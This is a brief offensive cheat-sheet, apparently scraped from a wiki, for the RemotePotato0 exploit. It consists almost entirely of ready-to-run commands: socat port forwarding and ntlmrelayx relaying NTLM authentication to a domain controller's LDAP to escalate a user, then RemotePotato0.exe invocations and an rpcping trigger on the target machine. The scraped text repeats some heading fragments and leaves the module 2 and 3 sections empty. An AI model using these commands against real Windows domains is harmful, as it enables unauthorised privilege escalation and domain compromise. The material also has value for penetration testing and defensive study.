RemotePotato
Exploit
Module 0 (-m 0: Rpc2Http cross protocol relay server + potato trigger)
-m 0: Rpc2Http cross protocol relay server + potato trigger)# In attack machine
sudo socat tcp-listen:135,fork,reuseaddr tcp:<target-ip>:9999 &
sudo ntlmrelayx.py -t ldap://<target-dc-ip> --no-wcf-server --escalate-user normal_user
# In target machine
# -m 0: Module (Rpc2Http cross protocol relay server + potato trigger)
# -r: Remote HTTP relay server
# -x: Rogue Oxid resolver ip
# -p: Rogue Oxid resolver port
# -s: Session id for the Cross Session Activation Attack
.\RemotePotato0.exe -m 0 -r <attack-ip> -x <attack-ip> -p 9999 -s 1Module 1 (-m 1: Rpc2Http cross protocol relay server)
-m 1: Rpc2Http cross protocol relay server)# -l: RPC Relay server listening port
.\RemotePotato0.exe -m 1 -l 9997 -r <attack-ip>
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlmModule 2 (-m 2: Rpc capture server + potato trigger)
-m 2: Rpc capture server + potato trigger)Module 3 (-m 3: Rpc capture server)
-m 3: Rpc capture server)References
Last updated